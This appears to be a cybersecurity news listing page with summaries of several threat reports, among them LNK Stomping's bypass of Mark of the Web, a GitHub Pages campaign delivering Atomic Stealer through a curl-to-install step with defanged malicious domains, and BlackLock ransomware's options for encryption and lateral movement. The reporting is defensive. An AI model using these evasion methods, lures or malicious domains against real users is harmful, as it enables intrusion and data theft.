Montréal, Quebec, September 18, 2025 – In an unprecedented operation, the Royal Canadian Mounted Police (RCMP) Federal Policing – Eastern Region has executed the largest cryptocurrency seizure in Canadian history, recovering over 56 million dollars from the now-defunct TradeOgre exchange platform. This marks the first time Canadian law enforcement has dismantled an entire cryptocurrency trading […]
A sophisticated attack technique called LNK Stomping has emerged as a critical threat to Windows security, exploiting a fundamental flaw in how the operating system handles shortcut files to bypass security controls.
Designated as CVE-2024-38217 and patched on September 10, 2024, this vulnerability demonstrates how attackers can manipulate Windows shortcuts (LNK files) to circumvent the Mark of the Web (MoTW) security feature, potentially allowing malicious code execution without triggering security warnings.
The attack technique exploits Windows Explorer’s path normalization process, causing the system to inadvertently remove MoTW metadata from malicious files.
This bypass enables attackers to execute payloads while evading detection from Smart App Control (SAC) and SmartScreen, two critical Windows security components designed to protect users from untrusted downloads.
LNK Stomping Exploitation
ASEC reports that LNK Stomping leverages the complex binary structure of Windows shortcut files, particularly targeting the LinkTarget IDList component.
This section contains Shell Item IDs that specify the hierarchical location of target files within the Windows Shell namespace.
Attackers manipulate this structure by creating non-standard path configurations that trigger explorer.exe to perform canonicalization operations.
The attack follows a specific sequence when a user clicks a maliciously crafted LNK file containing abnormal path structures, Windows Explorer detects the non-standard configuration and attempts to normalize it.
During this process, the system overwrites the original LNK file while inadvertently removing the NTFS Alternate Data Stream (ADS) called Zone.Identifier, which contains the MoTW metadata.
This removal occurs before security checks are performed, allowing the malicious payload to execute without triggering defensive mechanisms.
Three primary manipulation techniques have been identified, PathSegment type attacks place entire file paths within a single IDList array element rather than properly segmented components, Dot type attacks append periods or spaces to execution target paths, and Relative type attacks use only filenames without complete path specifications, all creating structural inconsistencies that trigger the normalization vulnerability.
Executing an lnk file using the LNK Stomping attack technique
Security researchers at Elastic Security Labs identified numerous LNK Stomping samples on VirusTotal, with the oldest submissions dating back six years, indicating this technique has been exploited in the wild long before its formal disclosure.
The technique’s effectiveness stems from its ability to appear as legitimate system behavior. When LNK files execute, they invoke trusted Windows utilities, making malicious activities blend seamlessly with normal system operations.
CISA added CVE-2024-38217 to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation by threat actors.
This approach has become increasingly popular following Microsoft’s macro blocking policies implemented in 2022, forcing attackers to seek alternative initial access vectors through file formats like ISO, RAR, and LNK files distributed via email attachments or compressed archives.
Organizations face significant detection challenges because the attack exploits fundamental Windows file handling mechanisms rather than external vulnerabilities.
Traditional signature-based detection methods may fail to identify these attacks since they leverage legitimate system processes and file structures.
The persistence of this vulnerability for years before discovery highlights the importance of format-level security research and behavior-based analysis to identify previously unknown evasion techniques in familiar file types.
The Federal Bureau of Investigation has issued a critical public service announcement warning citizens about cybercriminals creating sophisticated spoofed versions of the FBI’s Internet Crime Complaint Center (IC3) website to harvest sensitive personal information from unsuspecting visitors. According to FBI Alert I-091925-PSA released on September 19, 2025, threat actors have been actively creating fraudulent websites […]
Industrial control systems (ICS) continue to face increasing cybersecurity challenges as threat actors employ sophisticated malicious scripts and phishing campaigns to target critical infrastructure. According to new data from Q2 2025, while overall attack rates have shown a marginal decline, specific threat vectors including email-based attacks and malicious documents are intensifying their assault on industrial […]
A sophisticated cyber-attack campaign exploiting GitHub Pages to distribute the notorious Atomic stealer malware to macOS users.
The threat actors behind this operation are leveraging Search Engine Optimization (SEO) techniques to position malicious repositories at the top of search results across major platforms, including Google and Bing, targeting users searching for legitimate software from technology companies, financial institutions, and password management services.
The campaign demonstrates a multi-layered approach where cybercriminals create fraudulent GitHub repositories that masquerade as official software distributors.
When victims search for specific applications, the poisoned search results redirect them to malicious GitHub Pages hosting what appears to be legitimate software installers.
The LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team identified this threat after discovering two fraudulent repositories specifically targeting their customers, both created by the user “modhopmduck476” on September 16, 2025.
Atomic Stealer Campaign Targets macOS Users
The attack chain begins with victims encountering malicious GitHub Pages through SEO-poisoned search results.
SEO-driven Referral to Malicious Software
These repositories contain deceptive “Install [Company] on MacBook” links that redirect users to secondary staging sites.
LastPass Impersonation Page
In the LastPass case, victims were redirected to hxxps://ahoastock825[.]github[.]io/.github/lastpass, which subsequently forwarded them to macprograms-pro[.]com/mac-git-2-download.html.
The secondary site instructs users to execute a terminal command that performs a CURL request to a base64-encoded URL.
Secondary site
This encoded URL resolves to bonoud[.]com/get3/install.sh, which downloads the malicious payload disguised as a system “Update” to the temporary directory.
The downloaded file is actually the Atomic stealer malware, also known as AMOS malware, which has been active in cybercriminal circles since April 2023.
Atomic Stealer represents a sophisticated information-stealing threat specifically designed for macOS environments.
The malware is capable of harvesting sensitive data, including passwords, browser cookies, cryptocurrency wallet information, and system credentials.
Once installed, it establishes persistence on the infected system and communicates with command-and-control (C2) servers to exfiltrate stolen data.
The threat actors have demonstrated operational resilience by creating multiple GitHub usernames to circumvent takedown efforts.
This distributed approach allows them to maintain their malicious infrastructure even when individual repositories are reported and removed.
The campaign’s scope extends beyond LastPass, with security researchers identifying similar attacks targeting various technology companies and financial institutions through identical tactics and techniques (TTPs).
LastPass has successfully coordinated the takedown of the identified malicious repositories and continues monitoring for additional threats.
The company advises macOS users to exercise caution when downloading software through search results and to always verify the authenticity of repositories before executing terminal commands or installing applications from unofficial sources.
A sophisticated attack technique called LNK Stomping is enabling cybercriminals to bypass Windows security protections designed to block malicious files downloaded from the internet. The technique exploits a vulnerability in Windows shortcuts that was patched in September 2024 as CVE-2024-38217. Windows shortcuts, known as LNK files, have become increasingly popular attack vectors since Microsoft strengthened macro blocking […]
A sophisticated new ransomware operation dubbed BlackLock has emerged as a significant threat to organizations worldwide, demonstrating advanced cross-platform capabilities and targeting diverse computing environments.
Originally operating under the name “El Dorado” since March 2024, the group rebranded to BlackLock in September 2024, establishing itself as a formidable player in the ransomware landscape with victims spanning multiple countries and industries.
BlackLock’s technical sophistication lies in its development using the Go programming language, enabling the malware to execute seamlessly across Windows, Linux, and VMware ESXi systems.
This cross-platform approach significantly expands the attack surface, allowing threat actors to compromise entire IT infrastructures simultaneously.
The ransomware operates under a Ransomware-as-a-Service (RaaS) model, actively recruiting skilled affiliates through Russian-speaking cybercrime forums, particularly RAMP.
BlackLock DLS
Advanced Encryption and Cross-Platform Capabilities
ASEC reports that the ransomware implements robust cryptographic techniques, utilizing Go’s crypto package to perform file encryption through ChaCha20.NewUnauthenticatedCipher() with randomly generated 32-byte FileKeys and 24-byte nonces for each targeted file.
This approach ensures that every encrypted file receives a unique encryption key, making recovery virtually impossible without the attackers’ decryption tools.
BlackLock’s sophisticated key management system employs Elliptic Curve Diffie-Hellman (ECDH) key exchange to generate shared keys for metadata encryption.
The ransomware appends encrypted metadata containing the FileKey and victim information to each file, protected by secretbox.Seal() encryption.
This dual-layer encryption strategy prevents victims from independently recovering their data while ensuring the attackers can decrypt files upon ransom payment.
The malware supports extensive command-line arguments for operational flexibility, including -path for targeted encryption, -delay for timed execution, -threads for performance optimization, and -perc for partial file encryption to accelerate the attack process.
Notably, the ransomware includes provisions for VMware ESXi environments through the -esxi option, though this feature remains unimplemented in the analyzed samples.
BlackLock demonstrates advanced network propagation capabilities by utilizing open-source projects like go-smb2 to scan and access SMB shared folders across Windows networks.
The ransomware can authenticate using plaintext passwords or NTLM hashes specified through the -u, -p, and -h parameters, enabling lateral movement across corporate networks and simultaneous encryption of networked storage systems.
To eliminate recovery options, BlackLock employs sophisticated data destruction techniques targeting Volume Shadow Copy Service (VSS) and Recycle Bin contents.
Rather than executing obvious command-line instructions, the malware constructs COM object instances to execute WMI queries through shellcode loaded directly into memory, making detection significantly more challenging for security solutions.
Ransom note
The ransomware creates ransom notes titled HOW_RETURN_YOUR_DATA.TXT in every encrypted directory, containing threatening language that warns victims of business disruption and data leakage to customers and the public if ransom demands are not met.
This psychological pressure tactic, combined with the technical impossibility of independent data recovery, creates substantial leverage for the attackers.
Organizations must implement comprehensive security strategies encompassing endpoint protection, network segmentation, and robust backup solutions to defend against this evolving threat landscape.
A critical token validation failure in Microsoft Entra ID (previously Azure Active Directory) could have allowed attackers to impersonate any user, including Global Administrators, across any tenant.
The vulnerability, tracked as CVE-2025-55241, has been assigned the maximum CVSS score of 10.0. It has been described by Microsoft as a privilege escalation flaw in Azure Entra. There is no
Cybersecurity researchers have identified a concerning development in the underground cybercrime marketplace: a sophisticated Remote Access Trojan (RAT) being marketed as a fully undetectable (FUD) alternative to the legitimate ScreenConnect remote access solution. This emerging threat represents a significant escalation in the professionalization of malware-as-a-service operations, with threat actors specifically targeting the trust associated with […]
A sophisticated malware campaign is targeting Mac users through fraudulent GitHub repositories that masquerade as legitimate software downloads, with threat actors exploiting search engine optimization tactics to deliver malicious links directly to unsuspecting victims. The LastPass Threat Intelligence, Mitigation, and Escalation team has identified an ongoing widespread infostealer operation that specifically targets macOS users through […]
